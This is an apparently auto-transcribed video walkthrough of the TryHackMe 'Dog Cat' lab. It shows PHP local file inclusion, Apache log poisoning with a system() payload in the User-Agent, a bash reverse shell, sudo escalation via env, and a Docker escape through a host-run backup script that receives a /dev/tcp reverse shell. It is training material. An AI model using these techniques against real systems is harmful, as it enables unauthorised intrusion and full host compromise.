Good evening, everyone. My name is Braindead. I train every day. One try hack your room, one new skill, always ethical, and by 30, I will be a professional hacker. Alright, I am jumping right into the room today. I am on a tight schedule and I gotta stay committed. So, we are doing Dog Cat. I made a website where you can look at pictures of dogs and or cats, exploit a PHP application via local file inclusion, and break out of a Docker container. So, let's take a look. I already have the machine started. I'm going to quickly go over what LFI is, or local file inclusion, just so we are all on the same page. And I have definitely performed a local file inclusion before. So, a local file inclusion is a web security vulnerability where an attacker can include and execute files that are already on the server by exploiting a vulnerable application. This often happens when an application improperly handles user inputs for file paths, allowing attackers to use directory traversal characters to access sensitive files like etc password. And this is right here an example of local file inclusion. /////// etc password, and it will show you the etc password. So let's hop right into my VM. I need to enable my VPN here so we can actually talk to the TryHackMe room. Alright, we got that going. We're going to open up a new tab. CD TryHackMe. We're gonna make a new directory called dog cat. All right, we're gonna make sure we have contact with the server, and I don't. You know why? Maybe if I type the right IP address. Let's hit that, and I'm getting responses. First things first, we gotta run an Nmap scan. Nmap scan reveals all vulnerable ports that it finds. So I'm going to run the Nmap scan. So we're running with the default scripts. We're detecting service versions. And we are going to print this log file out to a text document. This is called Nmap all. We're going to hit all the ports with the -p dash. The dash at the end of the -p signifies all 65,000 ports I wanted to check. And I'm typing the IP address in. We'll be back when the port scan completes. You know what? We're already getting results, so it should be a quick scan. Alright, and we are back. We have the Nmap scan completed. So what did we find? We found port 22, or SSH, is open. And we found port 80, which is open, which is an HTTP server. It's also running a 2.4.38. Immediately, that's pretty low. Let's head over to this website. Now, I wanted to kind of clarify, I am not that good at hacking. I'm only on day 26 of this challenge. I need to get to day 1000. So let's put that into perspective here. So I am learning these rooms. So although I am taking a bit of an authoritative stance on it, trying to educate you guys as best as I can, I am learning these methods at the same time. So, what would you like to see? A dog or a cat? And I'm going to run a Go Buster, but I kind of have an idea already what the vulnerability might be. I'm just going to run a Go Buster, though, just to be on the safe side. So we're going to designate the URL, which is that, and we're going to get my word list, which is equals share word list. I'm going for I had the same problem in my last video, where my sec list is not providing me with what I need. So I think it's discovery. Then I think, let me move my... So you can see the commands I'm typing. Discovery web content big.txt. That's a total guess. Is that right? I can't believe it was right. We're going to have this running in the background. Now, I just wanted to look again at this. So, obviously, to execute a local file inclusion, I'm going to copy right here. Right. And we are just going to try like that. Let's see. I might have to do something slight bit different than that. Let me try that. We got cats and we got dogs. So, you know what? It's actually cats. So, I'm going to go just a bit further. Let's see if we can somehow get it to reveal Etsy password to me. Not yet. Page equals. Oh, maybe I got to actually do it like this. Sorry, only dogs or cats are allowed. So I think it has to have the word dogs in it. No such stream. So, I'm going to spam it again. Just to, Okay, let me, take a more reasonable approach here. And let's just do Etsy password. See if that... No, obviously that wasn't going to find it. So we're going to do one more. Etsy password. Nope. Let's do one more. What just happened there? Okay, good. And we're going to do one more. Let's do one more. And just to kind of visualize what I'm actually doing here. So we're going to use the CD command. I'm going to make this bigger. So what's my working directory? It's try hack me. So what I'm doing is and let's just see what happens when I do that. It takes me back a directory, right? So what I'm basically doing here is from the dogs directory, I want it to go back one. I want to go to a previous directory. So I want this to basically go all the way back to root and then go to Etsy, then password. So at some point here, if I'm doing this correctly, I might be doing it wrong. It should actually tell me the contents of the Etsy password file if local file inclusion is possible. So, let's see how we can achieve local file inclusion. So, just to be clear, when we do this, only dogs and cats are allowed. How could we subvert that? Oh. Okay. So I am reading a bit of a walkthrough just so I can understand the material. I am familiar with local file inclusion, but of course there's different methods here. So we actually have to encode this into... Okay, so let's look this up. Let's look up a PHP filter for base 64. You could filter for a valid base 64. I need to make some notes here. Okay, let's do this. We're going to make a new cat dog. So, let's see what we got. Okay, so PHP filter, is that what I'm doing? Okay. Okay. Okay, let's see. How to base 64 PHP filter encode. Let's see, because we want to actually convert this to a PHP filter. Okay, so we actually found it right here. So, this is excellent. This is excellent. Okay, so we need exactly this. resource. So I'm gonna put Etsy password here. So that was phenomenal. I can't believe we found that easily. Now, I am getting my hopes up here. Etsy password. Come on, let me get a base 64. No. I need to include dogs or cats. How do I do that? How do I do that? How do I do that? Oh, it's dogs? Dogs? Dogs. Yes, it is. No. Let me also go a bit further back. See what we got, just in case. Now, I'm going to just try dog. No, that didn't work. That would have been nice. Now, I do see it's failed on var www html index.php. So I wonder if we could just pull that. I wonder if we could just pull that. So I'm just going to run this. See what we get. Okay, you know what? Let me do a var www.html index.php. Can I just pull that? Here you go. But it failed to open the stream. Let me go back. Maybe I just have too much. Maybe I'm just going too far back. I'm gonna try this though. No. Oh, .php. Oh, I didn't realize it's doing it twice. Oh, there we go. There we go. So we got this base 64 string, and we just have to decode this to see what it says, which is excellent. I think we might be able to get. I might try Etsy password after this. So we got the index file. So it looks like. Let me make this bigger for you folks, so you can see that. So we got the HTML file. Obviously, we got blah blah blah. What would you like to see? Button ID, and here is the function. Get extension PHP if the string function contains string substring return string position string then substring. Sorry, I'm just turning my heater on. So I don't so if contains string dog, here you go. If contains string cat. Okay, so that's the reason we have to enter that. Okay. So, I mean, it's adding a PHP to the end. Am I correct on that? Get extension PHP. So it's adding a PHP extension. How do I abuse that? Wait. Let me. Oh. I just want to run this through. Okay, I have this running through AI just so I could understand the code breakdown, because I think this sets extension to whatever the user provides in the extension get parameter. If none is provided, it defaults to PHP. Okay, so I could actually choose what extension I want, which is great. Okay. So that defaults to .php, which makes sense. So we just have to add the extension. So let me actually do Etsy password. And I'm going to have to put the extension because it's looking for Etsy password.php right here. Duh. So what even is Etsy password? It's a text file. So I do. How did I do it? How do I do it? Where's the do I just put at extension equals. Is that what I do? I don't know if this is right. Equals text. Oh, is it dot text? Dot text. I don't know what type of file this is. How do I even get the extension of this? Etsy password. What extension does Etsy password have? How do I even tell? Maybe it's not even worth it. I mean, I guess really though, I think I get the user flag. Right? I mean, maybe I can Can I find the page? Jeez. Okay. Maybe I could get. How do I find users? But I need Etsy password to find users. So extension equals. What if I just don't define an extension? Boom. Okay. Cool. I got base64 for Etsy password now. Nice. That is great. That is great. That is great. That is great. Making nice progress on this room. I need to just copy this. I really want to. Coding the URL with. Let me just copy this. No, that's not what I want. I want to copy this. Okay, and we got that long string. I don't know if I just messed up. Do I still got the same string? Nope. Let me go back. Grab this text. We're going to decode this now. And let's see what we get. We should get Etsy password. Beautiful. So we got Damon. www-data. I don't know how to get a reverse shell on here though. I don't know. So we obviously got. Okay, I think the only real thing we could do is just. So it's an Apache web server. We know that. So maybe I just have to look for. Where is? Did I not make a directory for this? Oh, dogcat. There it is. Where is my nmap scan? Oh, did I put in the wrong directory? I did. Okay, so we're gonna move nmap to my dogcat. Okay, we're going to dogcat. We're gonna cat this one more time. Which Apache? How do I like enumerate this? I don't know how I would figure out what files are in this directory. I mean, okay. We have this. What is probably the main user here? I don't even see like a. Apt? Oh, but non-existent. Nats? No. Backup. I guess I could do www data. Maybe there's something in that directory. Let's try that. Let's just try that. I don't know what I'm looking for though. Let's do a home and let's just do I don't know what it would be. Flag 1? Text? No. Like, I don't know how I could possibly... I also typed it wrong, so let me just make sure that's clear. Now, I'm going to even try flag, because I don't... Huh. How would I get reverse shell? Apache configuration files. Wow. Huh. Okay, so I am reading a walkthrough. Let me just look at another walkthrough because I did understand what he was explaining, but I feel like, wow, that seems over the top. Wappleizer? I need to get this Wappleizer plugin. There's apparently a lot of people are enumerating websites with Wappleizer. So I'm just gonna make a note to do that. Okay. Oh, wow. Apparently... Wow. So I actually have an old attempt at this room from I don't even know how long ago. It's actually telling me to go to var log apache access log, and we're not assigning an extension. Okay, so we get this ridiculously long, oh my goodness, I think we got it, but very long base 64 string. Did I not copy it correctly? Oh no, I did. So these are the logs for the server. Oh, was this me? I'm guessing this was me. Oh my goodness, is it gonna run through the whole entire Go Buster? Okay, so that was me. Obviously. And I guess I recorded the logs. Oh, that's also me. So this is recording the logs of everything I did to the server, which I don't know how that helps me. Why is this the way to progress in this room? Where is my dog cat? Oh, here. Why is that the path forward? How can you abuse access.log? The most common and dangerous attack is called log poisoning. The web application must be vulnerable to LFI. It is. Malicious log. The server must write unsanitized user-supplied input from the user agent or form field into the access log. Okay. So I was looking at a walkthrough, and that is literally supporting exactly what the walkthrough said. Okay, so I think there's only really one method here. We have to supply the user agent with a payload. So let's do that. I'm gonna go back over here. Jeez, okay. So we are gonna open up Burp Suite today. Great. So Burp Suite, if you're not familiar with it, it is a middleman between the client and the web server. So we could actually intercept the request that the client is sending to the web server. And in this case, we are manipulating the user agent so that way it works in my favor. So in this case, we are actually let's actually see. Access.log user agent with LFI vulnerability. It is giving me a line here to enter, but I just don't know how it got this line. To include a run no compromise log file, PHP. How the attack works, PHP. This is it right here. Okay. So that is it right there. So let me make a note. Let me add that to my notes. Okay. So that is going to be our user agent. So let's execute this. Dogcat. What am I even on right now? I don't think this even matters at this point. Etsy password. We'll do an extension. Okay, and I have proxy enabled. Let me make sure my proxy is enabled so we can intercept the request. And do I have my extension enabled? Let's turn my proxy on. Okay, I have the request in my Burp Suite now. I can't make it bigger. Sorry. We need to add a field to this. So this right here. I don't know if that even matters where I put it. I'm just gonna put it right here. No, what just happened? PHP system get cmd, close the square bracket, close the parentheses. We are going to close. Okay. And what I wanted to do is at cmd equals, let's run a who am I as a test. Oh, I hope this works. Oh, you know what? No. I can't do Etsy password. I need to do Apache logs. I need to, so I can see what, okay. Now, if I did this correctly, I should get base 64 over here. Oh, fingers crossed. Come on. But did I get, did it run the command? That's really what I need to see, is if it ran the command. And if I ran the command, I should see www-data. Oh my god, I'm just gonna do this. I did not do that right. I just didn't. Oh my goodness, please. Ugh. What a pain. Please stop alerting me. Okay. Can we go back to the... Oh my god. Okay, come on, yeah, right there. All right, we're gonna copy all this shenanigans. Go, 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 go. Okay, great. So we copy that, and let's go back to base64 decoder. Oh, no. I need to take off intercept. Okay, let's take off intercept. I might as well take my proxy off as well. Okay, decode. All right, we got a bit of lag. Click or tap here to select a file. Today. Oh, no. I don't need to do that. Is this the output? Okay, great. Okay, let's go here. Did it get what I needed? Did it run? Ah, it didn't submit what I wanted to submit. Okay, I should have properly typed it. However, I felt like the intercept should have fixed what I just did. Which, yeah, why, what? What? I don't understand. Why didn't it add what I asked? Resource cat. Let me just paste that again. Cause let me just no. Oh jeez. Whoa. Down here? Anything? Okay, let me rerun the command. Let me turn everything back on. Proxy. Turn my proxy back on. Yes. So instead of this, I need to go to var Apache to access.log. There is no extension on it. We need to do a cmd equals who am I. Let's execute that. Okay, so that should get picked up right here. Beautiful. And let's copy my text here. And I don't know, let's just put it right here. Okay. We don't need the user agent part though, we just need the PHP. Okay, so CMD, and I have CMD in the command. Oh my goodness, I hope this works. I'm just gonna copy this, just so I don't have to type it again. If I do, let me copy this, just so I don't have to type that again. Alright, let's see what we get. Ooh, I got an error. var apache 2.accesslog. Where did I type wrong? var, I forgot log. It happens. I have like a million different requests now though. Let's do this. Let's put log and let's re-intercept the traffic. Okay. And we're just gonna get the PHP, get that. Let's put that right back in there, and let's see what we got. All right, hopefully, if we did this correctly, this should tell us. Wait, what am I doing? I'm putting it in the wrong section. Oh my gosh. Okay, let's redo that. That's incredible. That's funny though. So if we go to the bottom of this, we should see the who am I request. Can't see it didn't work. Maybe I have to put the user agent in better. Let me just take a look at the walkthrough just to see how did he do this. Instead of doing CMD, he did C. Which I don't really know why it matters. What did he get? But it was right actually after the request is where it told him. But no, it doesn't tell me at all. Does this tell me anything? No. Hmm. Okay. Let's try it again. I gotta figure out what did I get wrong. Let me actually do a C instead of a CMD. Although that one did say. Let's run that. Oh, I didn't have my proxy on. Proxy. Let's do that. What am I looking at right now? Okay. Let's change the user agent to match what I need it to be, which is, gotta pull up my notes real quick, grab that. Instead of CMD, I'm gonna just try C. I don't know why this would make a difference, but I'm gonna try it. See what we get. Okay, we got that. Let's make sure we grab this whole string of text. Okay, we did. Let's go all the way back to the top. Let's paste that in. Okay. Oh. Hopefully we can get a flag today. Did we convert? What's going on? Decode. Did I get a conversion? I'm getting lag, but not the conversion. Come on. Resend. Base64 decoder. The text is just so long. It's not, or maybe I'm just frozen here at this point. What's going on? I literally had my proxy on the entire time, and I'm wondering why none of my pages are loading. Wow. Wow. Okay. Let's paste that base64. Let's see what we get here. Hopefully we get something nice. Hopefully I get a www-data as the response here. X at C equals who am I? Am I just not putting the user agent in correctly? What we gotta figure out at C equals who am I? And then the user agent, what is all these requests? I need to just drop all of it. Okay. HTML. Okay, so did he just like... He just replaced like half of it. So I'm just gonna replace it then, rather than... Let me turn my stuff back on. Open, yes. Intercept. Woohoo. So he literally just gets rid of this. Boom. See ya. Right? And then we're just going to paste the payload again. Boom. And he calls it C. Everything looks all right here, right? Question mark. Let me look at his real quick before I... Let's make sure my payload looks exactly the same. PHP underscore system. We got a bracket close. We got a parentheses. We got a semicolon. Question mark. Okay, this looks good. This looks good. Okay, well, we just got to grab the payload again. So we're going to disable the proxy so I don't get stuck again. And we're going to copy this big old text. Okay. Let's go back to the top here. Let's paste my new base64 string. Now, if we did everything correctly, come on, let me see execution of my command. I don't think it's executing. Why is it not executing? Get var. Who am I? And in his log, get view. Log an extension. Let me just look a bit further up. Maybe I'm just not looking at the right spot. Any of these has to just say what I needed to do. Who am I? Is it really not www-data? Those are my earlier commands. The logs had evidence. We'll define a variable with system commands and run the who am I. And I typed who am I, right? I'm sure I did. Who am I? You know what? I'm about to just get it to read the logs again. Because, I mean, I don't know. I feel like I had to did that, right? Let's just do this. Let's turn my proxy back on. No, actually, I don't need to even intercept it. I just need the base64. Okay. And let's just see if it executed what I needed. Okay. Paste that. Decode. Okay, we got it decoded. I just want to see if it took the response. I'm getting stuck on this part. PHP system. I don't know what I'm doing wrong. We will capture the request using burst suite and we'll manipulate the user agent. We can see the default user agent in the image below. Now I see it. And he's just injecting it right there. Same place I am. But why is mine not working? Like right after this who am I command, it should just say www-data. View source. Wait, what? What? The selection source. Now that's a bit different than what, Oh, he didn't even base 64 it. Wait, how did he do that? Oh my goodness, I didn't even realize that. He didn't base 64 it. Okay, so he's not even decoding this. He's literally just executing. So, I'm over here wondering why it's not working. He didn't even base 64. So is that what I need to do? But he did dog. Dog. Okay, let's intercept this, because that's Duh. I didn't even need to do all this. The base 64 is preventing the command from executing. Let's grab this. Let me grab my chunk here. I could have probably left this as CMD, but I'm gonna just follow what this guy's doing. Okay. This, I feel like this should work. Go. Oh, nice. It even shows me right here, which is way better than me base 64 decoding it. Did it give me a... Who am I? At sea, Mozilla. But it also had that agent in there. So which one's my command? Because I don't think I added that agent, did I? Wait. I didn't add the agent, did I? I don't think. I'm about to... I think I should just run it again. Because that's not the agent I ran. Oh, I see how this works. So when I do this, it actually shows me the agent that ran it, and then instead of... it'll actually just execute this code. That's funny. So CMD, but it's actually C. Let's do that again. Because what was that? Down, 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 down. Oh my god. Down, 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 down. Okay, who am I? Finally. Okay, we have remote code execution. So, there's a few things we could do here, actually. We could just go for the reverse shell at this point. I think we should just go for reverse shell. So, yeah, I'm just gonna go for the reverse shell here. I just don't know. Run the following command. Oh, this guy is using Metasploit to... Okay, I'm not using Metasploit. I'd rather just make my own command or whatever, find my own reverse shell. So I just need to make a PHP based reverse shell, or I guess that's a Python one. Anyway, ncn valp 1337. So we got our... we're listening for the reverse shell. We just gotta find a reverse shell now. Now I don't need this on. Let's find reverse shell generator. And what am I looking for? I'm gonna look for something that's compatible with PHP. So, pentest. Oh my god, I need a command. Well, I mean, that one works, right? Would that work? Shell? Or am I trying to get bash, really? And I probably need bash. Yeah, you know what? I'm just gonna do bash. That should work perfectly fine. Hopefully that works fine. I don't know what characters it's gonna accept here. Yeah, we'll see what happens here. At C equals, we're going to change that so it matches mine. 10, 6, 56, blah, blah, 1337. Do I have to modify this? I do, yeah, I have to intercept it, so I could get the agent. Alright, come on, let's go. If this works, woo, that would feel good. That would feel pretty good. I need to put the user agent. So we got the user agent, so we could actually see that. I mean, I don't even know if we need the user agent, to be honest. I'm going to put it, though. Forward. Come on. Come on. Come on. Come on. Come on. I should have immediately got it. Dang. Go away. No. Dang. Why didn't it get it? Did it throw an error? No. Dang. Let's see. How do I get a reverse shell? That's... reverse shell. I wonder if I could do a... I could try that. You know, let me just try this one. There's so many you could try. See, let's do that. And why is that the IP address? I don't think I've had that IP in a long time. 192.133.7. Do I still have my proxy on? I do. Let me make sure Burb Suite's listening. It is. Alright. And where is it? This one. It's definitely running that command. I don't know what the @ symbol's for. Oh! Is that gonna stop it from running? Shit. I think that's gonna stop it from running. How do I... Dang, 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 dang. How do I get this to run? I don't think this would work, right? Oh. And then, shit. That's a pain in my ass. That's a pain in my ass. Damn it. Well, we are going to see what happens. I don't think that's going to run, though. Where is my dog cat? Cat dog. Here it is. Alright. Got that. We're going to eliminate this section. Boom. We're going to call this C instead. Did I get lucky? I don't think I got lucky. Yeah. It threw a fit. Dang, I just need one flag. Come on. What error did I get on the last one? Oh, it had the and symbol. I need to find one without the and symbol. Reverse shell. Like all of them had the and symbol. I wonder if I could get that lucky. Should I try this? I'm just gonna try it. Like, what's the worst that could happen? I mean, that'd be amazing if it's just that simple. I don't know what I just closed. Hopefully nothing important. 10, 656, 192, 1337. I'm pretty sure all my stuff's still on. So, oh my god, a million different web pages. I have this, copy that. Let's change the user agent so it can... Okay. Oh my god. How is it not executing? How do I get this to execute? I'm about to just use Metasploit like he did. Because clearly he was onto something. PHP. Like, it's just bash. Alright, we'll use Metasploit. Not that big of a fan of Metasploit. You know what? No, I don't want to use Metasploit. I don't want to use Metasploit. There has to be another way to reverse shell. It's just a reverse shell. I should easily be able to. All right, I got this, guys. This guy should definitely work. It's actually, I saw this one too, and I'm just like, I thought it wouldn't work. So he used the URL encoder, actually. Okay. So, okay. Okay, that's how he managed to get around this. He URL encoded it. Duh, that's what I should have did. Oh, let me refresh this page. I don't know what I was on. I'm on proxy still. Oh my goodness, go. Okay, let's just look at it. You know what, just drop. Okay. So this should be better. Let me try this. So I'm just gonna use his, but I guess I could have URL encoded my other one. I didn't even think about this. I should have. Okay. Encode. PHP. Okay, cool. Okay, great. So we're gonna just put that right here. Okay. Let's turn our intercepts back on. Boom. Boom. Alright. I'm feeling good this time. Feeling good. Okay. We just have to put the user agent. Come on. I gotta also check to make sure my listener is still on. Okay, back over here. And my listener. Oh, we're on. We could quit this. Is my listener still on? Okay, good. Come on. Yes. Oh my god, who am I? WW data. Alright, let's stabilize the shell. Come on, that took forever. Let's go. Oh my god, what is the stabilization shell? I don't need to lose the shell already. Python 3. And we're just stabilizing the shell because it looks like crazy right now. Since we did a reverse shell. Putty.spawn bin bash. And that should fix our shell up. Please don't tell me to crash this. Okay. Let me just see what we got here. Okay, cat flag.php. Flag.php. We could probably disable the intercept, to be honest. Let us get access to flag.php though. Flag. Yeah, where am I? What is this directory? www HTML. Did I put too many W's? Flag. I'm just gonna do flag actually. There you go. What? Strings flag.php. Okay. I guess maybe that's what I should have did in the first place. Okay, great. This is not cat dog. All right, finally. Ugh. Good. I'm guessing that's the first one. Woo! All right. Right. Okay. Let's see. Where do we go from here? I do want to stabilize this shell because it's. I don't think it's gonna be that easy. I can't. I need to stabilize this. Dot text. Oh, maybe it was. I guess maybe there was some way to enumerate the directories. Okay. Backups, what do we got? Nothing. Nothing. There's a mail directory, I saw that. Home. LSA. Really? Nothing in the home directory? Oh, we're in a Docker container. I saw the mail directory though. Let's go to temp, see what's in there. Okay, how is there no users? I think it's because it's CD Etsy. What is this? Oh, you know what? I think that's just Etsy. I'd love to stabilize this shell. I wonder if there's a way with Python, but it doesn't look like it has Python. So let's just keep it moving. So I didn't actually realize, like, how did he stabilize? This guy stabilized the shell, but I don't know how he did that. Stabilized. Oh, you know what? I didn't realize you could stabilize this easily. Isn't that funny? Alright. Okay, we're stabilized now. Okay. So this guy literally just did a sudo-shell. May run the following commands: root no password, user bin env. Would okay, hold on. Let me just pull up a get the fuck out binary here. I'll show you guys that. Here. So that said env. Env. LOL. Okay. So it looks like we can literally just straight pull sudo. Don't fucking tell me I just broke the shell. Oh, okay. Whew. Whew. Oh my god. Alright. So we're root. Find name. Flag? I don't think that's how I type it. How do I type this? Oh. Can I go up? I can't. Okay. Find type of name flag. That's how I do it. No, it's not. Okay. How to... Oh, maybe if I typed it correctly. Type F dash name. I don't exactly know how to do it. I never did it before. Oh, that's cool. Root flag. Root. CD root. Cat flag 3.text. Okay, we're cooking. We're cooking right now. So we got that. Now I kind of want to get linps involved just to see how do I break out. Okay, I'm going to get linps on here, so let's go to the temp folder. Let's go to LSA. Where am I right now? Okay, Python 3, administrative server. That's 3000. Okay. Let's go back over here on our root Let's do a wget on my IP on port 8000 on linps. Come on. Curl -o HTTP 656 8000 linps.sh. Come on, come on, come on. Beautiful. Let's get this on linps. We're so close. Come on. I'm a ready root. Woohoo. I will resume the video as soon as this linps is finished. Okay, we are back. We just finished with the linp scan. So, we are still stuck in the Docker container. And I need to figure out how to get out. Okay. Let's see what linps found. This is like huge. I need to like not make this that big. Oh, I can't even edit it from here with the reverse shell. Right, can't do it. Yeah, I can't edit it with the reverse shell currently on. What the hell was that? Okay, well, interesting files. Let's see. Is there anything that looks... I'm already root, but I don't see anything. Writable mount points. Dangerous capabilities. Alright, I did cheat just now just to see, like, what am I supposed to be looking for? And I'll be honest, I don't know how I would find that file. I don't see it listed anywhere. I guess this is the part where it's... I just don't know. Ugh, I'm running low on time too. How would I have known to do this though? I guess backups looks like an interesting file, and then tar, what is it, XCF or CF to unzip this. Backup.tar. Well, I guess cat backup.sh. Okay, so bin bash literally on tar CF. What? Root container backup.tar. So this is being executed on the host. Oh. Wow. That's clever. All right, so we could disable this. We're not using linps anymore. We're gonna do them. We could do, I don't know. We're gonna do 1338 just because I ran out of cool numbers. We're gonna nano this. Backup. How do I edit this? Oh, I just literally just type it in. Okay, bash I, and we just echo it. Dev TCP 10.656.192.1338 and 1. Throw all the standard input. We get backup.sh. Cat backup.sh. So what do I do now? Oh! Who am I? Alright, and that is a successful room. Alright, so thank you all for watching. We just used local file inclusion with with some log poisoning. And then once we did that, we were able to reverse shell into the virtual machine. Then from there, we were able to abuse the env binary to get a sudo. Once we were sudo, we were able to locate this bash script. And this script, we detected that it was being ran from outside of the container based on the path, which was root/container, and container is obviously this VM right here. So since we found out that this was being executed from the root, we simply created a reverse shell and we set up a listener on our attack machine, and after a few seconds, it ran the script on the root computer, and we were able to get the root on... I don't know if we got root, did we? Yeah, we got root on the host machine. Thank you guys for watching. I'll see you tomorrow.